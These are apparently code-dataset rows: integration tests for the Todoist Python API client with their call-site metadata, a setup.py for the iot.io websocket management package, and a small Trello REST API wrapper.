api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label2 = api.labels.add('Label2')
api.commit()
api.labels.update_orders({label1['id']: 1, label2['id']: 2})
response = api.commit()
for label in response['labels']:
if label['id'] == label1['id']:
assert label['item_order'] == 1
if label['id'] == label2['id']:
assert label['item_order'] == 2
assert 1 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label1['id']
]
assert 2 in [
l['item_order'] for l in api.state['labels'] if l['id'] == label2['id']
]
label1.delete()
api.commit()
label2.delete()
api.commit()
def test_note_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
response = api.commit()
assert response['notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_note_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['notes'][0]['id'] == note1['id']
assert response['notes'][0]['is_deleted'] == 1
assert 'UpdatedNote1' not in [n['content'] for n in api.state['notes']]
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_note_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
note1 = api.notes.add(item1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['notes']]
assert api.notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
item1.delete()
api.commit()
def test_projectnote_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'Note1'
assert 'Note1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_projectnote_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.delete()
response = api.commit()
assert response['project_notes'][0]['id'] == note1['id']
assert response['project_notes'][0]['is_deleted'] == 1
assert 'UpdatedNote1' not in [
n['content'] for n in api.state['project_notes']
]
project1.delete()
api.commit()
def test_projectnote_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
note1 = api.project_notes.add(project1['id'], 'Note1')
api.commit()
note1.update(content='UpdatedNote1')
response = api.commit()
assert response['project_notes'][0]['content'] == 'UpdatedNote1'
assert 'UpdatedNote1' in [n['content'] for n in api.state['project_notes']]
assert api.project_notes.get_by_id(note1['id']) == note1
note1.delete()
api.commit()
project1.delete()
api.commit()
def test_filter_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
response = api.commit()
assert response['filters'][0]['name'] == 'Filter1'
assert 'Filter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.delete()
response = api.commit()
assert response['filters'][0]['id'] == filter1['id']
assert response['filters'][0]['is_deleted'] == 1
assert 'Filter1' not in [p['name'] for p in api.state['filters']]
def test_filter_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter1.update(name='UpdatedFilter1')
response = api.commit()
assert response['filters'][0]['name'] == 'UpdatedFilter1'
assert 'UpdatedFilter1' in [f['name'] for f in api.state['filters']]
assert api.filters.get_by_id(filter1['id']) == filter1
filter1.delete()
api.commit()
def test_filter_update_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
filter1 = api.filters.add('Filter1', 'no due date')
api.commit()
filter2 = api.filters.add('Filter2', 'today')
api.commit()
api.filters.update_orders({filter1['id']: 2, filter2['id']: 1})
response = api.commit()
for filter in response['filters']:
if filter['id'] == filter1['id']:
assert filter['item_order'] == 2
if filter['id'] == filter2['id']:
assert filter['item_order'] == 1
assert 2 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter1['id']
]
assert 1 in [
f['item_order'] for f in api.state['filters']
if f['id'] == filter2['id']
]
filter1.delete()
api.commit()
filter2.delete()
api.commit()
def test_reminder_relative_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 30
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_relative_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
reminder1.delete()
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
api.commit()
def test_reminder_relative_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
reminder1 = api.reminders.add(item1['id'], minute_offset=30)
api.commit()
reminder1.update(minute_offset=str(15))
response = api.commit()
assert response['reminders'][0]['minute_offset'] == 15
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
tomorrow = time.gmtime(time.time() + 24 * 3600)
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_reminder_absolute_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
api.reminders.delete(reminder1['id'])
response = api.commit()
assert response['reminders'][0]['is_deleted'] == 1
assert reminder1['id'] not in [p['id'] for p in api.state['reminders']]
item1.delete()
response = api.commit()
def test_reminder_absolute_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'tomorrow 5pm'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
reminder1 = api.reminders.add(item1['id'], due={'date': due_date_utc})
api.commit()
tomorrow = time.gmtime(now + 24 * 3600 + 60)
due_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
api.reminders.update(reminder1['id'], due_date_utc=due_date_utc)
response = api.commit()
assert response['reminders'][0]['due']['date'] == due_date_utc
assert reminder1['id'] in [p['id'] for p in api.state['reminders']]
assert api.reminders.get_by_id(reminder1['id']) == reminder1
reminder1.delete()
api.commit()
item1.delete()
api.commit()
def test_locations(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.locations.clear()
api.commit()
assert api.state['locations'] == []
def test_live_notifications(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
api.live_notifications.set_last_read(
api.state['live_notifications_last_read_id'])
response = api.commit()
assert response['live_notifications_last_read_id'] == \
api.state['live_notifications_last_read_id']
def test_share_accept(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation1 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation1 is not None
assert invitation1['project_name'] == project1['name']
assert invitation1['from_user']['email'] == api.state['user']['email']
api2.invitations.accept(invitation1['id'],
invitation1['invitation_secret'])
response2 = api2.commit()
assert api2.state['user']['id'] in \
[p['user_id'] for p in api2.state['collaborator_states']]
api.sync()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_reject(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation2 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation2 is not None
assert invitation2['project_name'] == project1['name']
assert invitation2['from_user']['email'] == api.state['user']['email']
api2.invitations.reject(invitation2['id'],
invitation2['invitation_secret'])
response2 = api2.commit()
assert len(response2['projects']) == 0
assert len(response2['collaborator_states']) == 0
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_share_delete(cleanup, cleanup2, api_endpoint, api_token, api_token2):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api2 = todoist.api.TodoistAPI(api_token2, api_endpoint)
api.user.update(auto_invite_disabled=1)
api.commit()
api.sync()
api2.user.update(auto_invite_disabled=1)
api2.commit()
api2.sync()
project1 = api.projects.add('Project1')
api.commit()
api.projects.share(project1['id'], api2.state['user']['email'])
response = api.commit()
assert response['projects'][0]['name'] == project1['name']
assert response['projects'][0]['shared']
response2 = api2.sync()
invitation3 = next((ln for ln in response2['live_notifications']
if ln['notification_type'] == 'share_invitation_sent'),
None)
assert invitation3 is not None
assert invitation3['project_name'] == project1['name']
assert invitation3['from_user']['email'] == api.state['user']['email']
api.invitations.delete(invitation3['id'])
api.commit()
project1 = [p for p in api.state['projects'] if p['name'] == 'Project1'][0]
project1.delete()
api.commit()
def test_templates(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
project2 = api.projects.add('Project2')
api.commit()
item1 = api.items.add('Item1', project_id=project1['id'])
api.commit()
template = api.templates.export_as_file(project1['id'])
assert 'task,Item1,4,1' in template
with io.open('/tmp/example.csv', 'w', encoding='utf-8') as example:
example.write(template)
result = api.templates.import_into_project(project1['id'],
'/tmp/example.csv')
assert result == {'status': u'ok'}
item1.delete()
api.commit()
project1.delete()
api.commit()
project2.delete()
api.commit()
| [((8, 10, 8, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(8, 33, 8, 42): 'api_token', (8, 44, 8, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((17, 10, 17, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(17, 33, 17, 42): 'api_token', (17, 44, 17, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((31, 10, 31, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(31, 33, 31, 42): 'api_token', (31, 44, 31, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((44, 10, 44, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(44, 33, 44, 42): 'api_token', (44, 44, 44, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((58, 10, 58, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(58, 33, 58, 42): 'api_token', (58, 44, 58, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((72, 10, 72, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(72, 33, 72, 42): 'api_token', (72, 44, 72, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((89, 10, 89, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(89, 33, 89, 42): 'api_token', (89, 44, 89, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((110, 10, 110, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(110, 33, 110, 42): 'api_token', (110, 44, 110, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((133, 10, 133, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(133, 33, 133, 42): 'api_token', (133, 44, 133, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((157, 10, 157, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(157, 33, 157, 42): 'api_token', (157, 44, 157, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((192, 10, 192, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(192, 33, 192, 42): 'api_token', (192, 44, 192, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((207, 10, 207, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(207, 33, 207, 42): 'api_token', (207, 44, 207, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((221, 10, 221, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(221, 33, 221, 42): 'api_token', (221, 44, 221, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((238, 10, 238, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(238, 33, 238, 42): 'api_token', (238, 44, 238, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((261, 10, 261, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(261, 33, 261, 42): 'api_token', (261, 44, 261, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((286, 10, 286, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(286, 33, 286, 42): 'api_token', (286, 44, 286, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((311, 10, 311, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(311, 33, 311, 42): 'api_token', (311, 44, 311, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((338, 10, 338, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(338, 33, 338, 42): 'api_token', (338, 44, 338, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((361, 10, 361, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(361, 33, 361, 42): 'api_token', (361, 44, 361, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((384, 10, 384, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(384, 33, 384, 42): 'api_token', (384, 44, 384, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((390, 10, 390, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((391, 15, 391, 43), 'time.gmtime', 'time.gmtime', ({(391, 27, 391, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((392, 19, 392, 64), 'time.strftime', 'time.strftime', ({(392, 33, 392, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (392, 55, 392, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((409, 10, 409, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(409, 33, 409, 42): 'api_token', (409, 44, 409, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((443, 10, 443, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(443, 33, 443, 42): 'api_token', (443, 44, 443, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((469, 10, 469, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(469, 33, 469, 42): 'api_token', (469, 44, 469, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((483, 10, 483, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(483, 33, 483, 42): 'api_token', (483, 44, 483, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((497, 10, 497, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(497, 33, 497, 42): 'api_token', (497, 44, 497, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((514, 10, 514, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(514, 33, 514, 42): 'api_token', (514, 44, 514, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((543, 10, 543, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(543, 33, 543, 42): 'api_token', (543, 44, 543, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((562, 10, 562, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(562, 33, 562, 42): 'api_token', (562, 44, 562, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((583, 10, 583, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(583, 33, 583, 42): 'api_token', (583, 44, 583, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((604, 10, 604, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(604, 33, 604, 42): 'api_token', (604, 44, 604, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((623, 10, 623, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(623, 33, 623, 42): 'api_token', (623, 44, 623, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((644, 10, 644, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(644, 33, 644, 42): 'api_token', (644, 44, 644, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((665, 10, 665, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(665, 33, 665, 42): 'api_token', (665, 44, 665, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((679, 10, 679, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(679, 33, 679, 42): 'api_token', (679, 44, 679, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((693, 10, 693, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(693, 33, 693, 42): 'api_token', (693, 44, 693, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((710, 10, 710, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(710, 33, 710, 42): 'api_token', (710, 44, 710, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((742, 10, 742, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(742, 33, 742, 42): 'api_token', (742, 44, 742, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((761, 10, 761, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(761, 33, 761, 42): 'api_token', (761, 44, 761, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((779, 10, 779, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(779, 33, 779, 42): 'api_token', (779, 44, 779, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((800, 10, 800, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(800, 33, 800, 42): 'api_token', (800, 44, 800, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((806, 10, 806, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((807, 15, 807, 43), 'time.gmtime', 'time.gmtime', ({(807, 27, 807, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((808, 19, 808, 64), 'time.strftime', 'time.strftime', ({(808, 33, 808, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (808, 55, 808, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((823, 10, 823, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(823, 33, 823, 42): 'api_token', (823, 44, 823, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((829, 10, 829, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((830, 15, 830, 43), 'time.gmtime', 'time.gmtime', ({(830, 27, 830, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((831, 19, 831, 64), 'time.strftime', 'time.strftime', ({(831, 33, 831, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (831, 55, 831, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((845, 10, 845, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(845, 33, 845, 42): 'api_token', (845, 44, 845, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((851, 10, 851, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((852, 15, 852, 43), 'time.gmtime', 'time.gmtime', ({(852, 27, 852, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((853, 19, 853, 64), 'time.strftime', 'time.strftime', ({(853, 33, 853, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (853, 55, 853, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((857, 15, 857, 48), 'time.gmtime', 'time.gmtime', ({(857, 27, 857, 47): 'now + 24 * 3600 + 60'}, {}), '(now + 24 * 3600 + 60)', False, 'import time\n'), ((858, 19, 858, 64), 'time.strftime', 'time.strftime', ({(858, 33, 858, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (858, 55, 858, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((872, 10, 872, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(872, 33, 872, 42): 'api_token', (872, 44, 872, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((883, 10, 883, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(883, 33, 883, 42): 'api_token', (883, 44, 883, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((895, 10, 895, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(895, 33, 895, 42): 'api_token', (895, 44, 895, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((896, 11, 896, 59), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(896, 34, 896, 44): 'api_token2', (896, 46, 896, 58): 'api_endpoint'}, {}), '(api_token2, api_endpoint)', False, 'import todoist\n'), ((935, 10, 935, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(935, 33, 935, 42): 'api_token', (935, 44, 935, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((936, 11, 936, 59), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(936, 34, 936, 44): 'api_token2', (936, 46, 936, 58): 'api_endpoint'}, {}), '(api_token2, api_endpoint)', False, 'import todoist\n'), ((974, 10, 974, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(974, 33, 974, 42): 'api_token', (974, 44, 974, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((975, 11, 975, 59), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(975, 34, 975, 44): 'api_token2', (975, 46, 975, 58): 'api_endpoint'}, {}), '(api_token2, api_endpoint)', False, 'import todoist\n'), ((1010, 10, 1010, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(1010, 33, 1010, 42): 'api_token', (1010, 44, 1010, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((1023, 9, 1023, 59), 'io.open', 'io.open', (), '', False, 'import io\n'), ((812, 27, 812, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
dylancrockett/iot.io | setup.py | 472767186a5500e05b02d821f32e1208f3652418 | from setuptools import setup
import iotio
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="iot.io",
version=iotio.__version__,
packages=["iotio"],
author="Dylan Crockett",
author_email="[email protected]",
license="MIT",
description="A management API for connecting and managing Clients via websocket connections.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dylancrockett/iot.io",
project_urls={
"Documentation": "https://iotio.readthedocs.io/",
"Source Code": "https://github.com/dylancrockett/iot.io"
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
install_requires=[
'gevent',
'gevent-websocket',
'flask',
'flask-sockets',
],
python_requires='>=3.7'
)
| [((7, 0, 34, 1), 'setuptools.setup', 'setup', (), '', False, 'from setuptools import setup\n')] |
xnoder/trellominer | trellominer/api/trello.py | 629d8f916486aa94a5bfa3a9497c36316c2864ed | import os
import requests
from trellominer.config import yaml
class HTTP(object):
def __init__(self):
self.config = yaml.read(os.getenv("TRELLO_CONFIG", default=os.path.join(os.path.expanduser('~'), ".trellominer.yaml")))
self.api_url = os.getenv("TRELLO_URL", default=self.config['api']['url'])
self.api_key = os.getenv("TRELLO_API_KEY", default=self.config['api']['key'])
self.api_token = os.getenv("TRELLO_API_TOKEN", default=self.config['api']['token'])
self.organization = os.getenv("TRELLO_ORGANIZATION", default=self.config['api']['organization'])
self.output_file = os.getenv("TRELLO_OUTPUT_FILE", default=self.config['api']['output_file_name'])
class Trello(HTTP):
def __init__(self):
super().__init__()
def boards(self):
url = "{0}/organizations/{1}/boards?key={2}&token={3}".format(
self.api_url, self.organization, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def cards(self, board_id):
url = "{0}/boards/{1}/cards?fields=shortLink,name,desc,idList,due,dueComplete,closed,idMembers&members=true&member_fields=fullName&key={2}&token={3}".format(
self.api_url, board_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def lists(self, list_id):
url = "{0}/lists/{1}?key={2}&token={3}".format(self.api_url, list_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def checklists(self, card_id):
url = "{0}/cards/{1}/checklists?key={2}&token={3}".format(
self.api_url, card_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
